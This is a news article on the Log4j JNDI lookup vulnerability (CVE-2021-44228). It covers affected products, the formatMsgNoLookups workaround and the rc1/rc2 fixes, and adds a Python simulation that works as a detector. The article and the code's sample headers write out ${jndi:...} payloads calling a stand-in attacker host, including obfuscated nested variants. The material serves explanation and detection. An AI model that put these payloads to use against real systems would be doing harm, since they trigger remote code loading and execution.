Vulnerability in Apache Log4j affects many Java projects

A critical vulnerability has been identified in Apache Log4j, a popular framework for organizing logging in Java applications. It allows arbitrary code execution when a specially formatted value of the form "${jndi:URL}" is written to the log. The attack can be carried out against any Java application that logs values received from external sources, for example when a problematic value is echoed back in an error message.

It is noted that almost all projects built on frameworks such as Apache Struts, Apache Solr, Apache Druid or Apache Flink are affected by the problem, including Steam, Apple iCloud, and Minecraft clients and servers. The vulnerability is expected to trigger a wave of mass attacks on corporate applications, repeating the history of the critical vulnerabilities in the Apache Struts framework, which, by a rough estimate, is used in the web applications of 65% of Fortune 100 companies. Attempts to scan the network for vulnerable systems have already been observed.

The problem is aggravated by the fact that a working exploit has already been published, while fixes for the stable branches have not yet been produced. A CVE identifier has not yet been assigned. The fix is so far included only in the log4j-2.15.0-rc1 test release. As a workaround that blocks the vulnerability, it is recommended to set the log4j2.formatMsgNoLookups parameter to true.

The problem stems from the fact that log4j processes special "${...}" lookup masks in the lines written to the log, and these masks can issue JNDI (Java Naming and Directory Interface) queries. The attack boils down to passing a string containing the substitution "${jndi:ldap://attacker.com/a}": when log4j processes it, it sends an LDAP request to the attacker.com server asking for the location of a Java class. The location returned by the attacker's server (for example, http://second-stage.attacker.com/Exploit.class) is then loaded and executed in the context of the current process, which lets the attacker run arbitrary code on the system with the privileges of the application.
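The following is an added illustration, not log4j's own code: a simplified model of how a "${...}" lookup in a formatted log message is expanded, with the jndi lookup stubbed so that it only records the URL the vulnerable path would contact instead of making a network request. It shows the plain payload from the paragraph above, what the log4j2.formatMsgNoLookups workaround changes, and, going slightly beyond the text, how nested lookups such as ${${lower:j}ndi:...} and the ${::-j} default-value form normalise to the same request, which makes the same resolver usable as a detector. The host attacker.com and the sample request headers are constructed placeholders.

```python
"""Simplified model of Log4j 2 ${...} lookup expansion (added example,
not log4j code). The jndi lookup is stubbed: it records the URL that the
vulnerable implementation would fetch rather than contacting it."""
from typing import Callable, Dict, List, Tuple

# Harmless lookups kept in the model so nested payloads such as
# ${${lower:j}ndi:...} can be expanded. Real log4j supports many more.
SAFE_LOOKUPS: Dict[str, Callable[[str], str]] = {
    "lower": str.lower,
    "upper": str.upper,
}


class LookupResolver:
    def __init__(self, format_msg_no_lookups: bool = False) -> None:
        self.format_msg_no_lookups = format_msg_no_lookups
        self.jndi_requests: List[str] = []  # URLs the vulnerable path would fetch

    def resolve(self, text: str) -> str:
        # The workaround from the article: with message lookups disabled the
        # formatted message is written verbatim and no lookup runs at all.
        if self.format_msg_no_lookups:
            return text
        expanded, _ = self._expand(text, 0, top=True)
        return expanded

    def _expand(self, text: str, i: int, top: bool) -> Tuple[str, int]:
        # Recursive descent over "${ ... }", innermost lookups first, so
        # ${${lower:j}ndi:...} becomes ${jndi:...} before being looked up.
        buf: List[str] = []
        while i < len(text):
            if text.startswith("${", i):
                inner, i = self._expand(text, i + 2, top=False)
                buf.append(self._lookup(inner))
            elif text[i] == "}" and not top:
                return "".join(buf), i + 1
            else:
                buf.append(text[i])
                i += 1
        return "".join(buf), i

    def _lookup(self, body: str) -> str:
        # Syntax modelled: prefix:key[:-default]; "${::-j}" yields "j".
        name, has_default, default = body.partition(":-")
        prefix, has_prefix, key = name.partition(":")
        if has_prefix and prefix == "jndi":
            self.jndi_requests.append(key)  # vulnerable path, recorded only
            return "<object loaded from " + key + ">"
        if has_prefix and prefix in SAFE_LOOKUPS:
            return SAFE_LOOKUPS[prefix](key)
        if has_default:
            return default
        return "${" + body + "}"  # unknown lookup stays literal


def format_message(template: str, *args: object,
                   format_msg_no_lookups: bool = False) -> Tuple[str, List[str]]:
    """Mimic logger.error("... {}", value): fill the "{}" parameters, then
    expand lookups over the whole formatted message, which is where an
    attacker-controlled value gets its ${jndi:...} interpreted."""
    msg = template
    for arg in args:
        msg = msg.replace("{}", str(arg), 1)
    resolver = LookupResolver(format_msg_no_lookups)
    return resolver.resolve(msg), resolver.jndi_requests


def scan_lines(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Detector: expand each line with the jndi lookup stubbed and report the
    lines that would have caused an outbound JNDI request. Because expansion
    is simulated, obfuscated forms normalise to the plain payload."""
    hits: List[Tuple[str, List[str]]] = []
    for line in lines:
        resolver = LookupResolver()
        resolver.resolve(line)
        if resolver.jndi_requests:
            hits.append((line, resolver.jndi_requests))
    return hits


# Constructed sample request headers (not captured traffic); attacker.com
# and the path /a are the placeholders used in the article.
SAMPLE_HEADERS = [
    "User-Agent: Mozilla/5.0",
    "User-Agent: ${jndi:ldap://attacker.com/a}",
    "X-Api-Version: ${${lower:j}ndi:${lower:l}dap://attacker.com/a}",
    "X-Forwarded-For: ${${::-j}${::-n}di:rmi://attacker.com/b}",
]

if __name__ == "__main__":
    payload = "${jndi:ldap://attacker.com/a}"
    print(format_message("Login failed for user {}", payload))
    print(format_message("Login failed for user {}", payload,
                         format_msg_no_lookups=True))
    for line, urls in scan_lines(SAMPLE_HEADERS):
        print("JNDI lookup attempted:", urls, "<-", line)
```

The detector deliberately reuses the expansion logic instead of a regular expression for the literal string "${jndi:": a signature on the raw bytes misses every nested or default-value variant, while simulating the resolution catches anything that would end up issuing a jndi lookup.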

Addendum 1: The vulnerability has been assigned the identifier CVE-2021-44228.

Addendum 2: A way to bypass the protection added in the log4j-2.15.0-rc1 release has been identified. A new update, log4j-2.15.0-rc2, has been proposed with more complete protection against the vulnerability. The diff shows a change in how an incorrectly formatted JNDI URL is handled: previously such a URL did not cause the lookup to be aborted.

source: budenet.ru
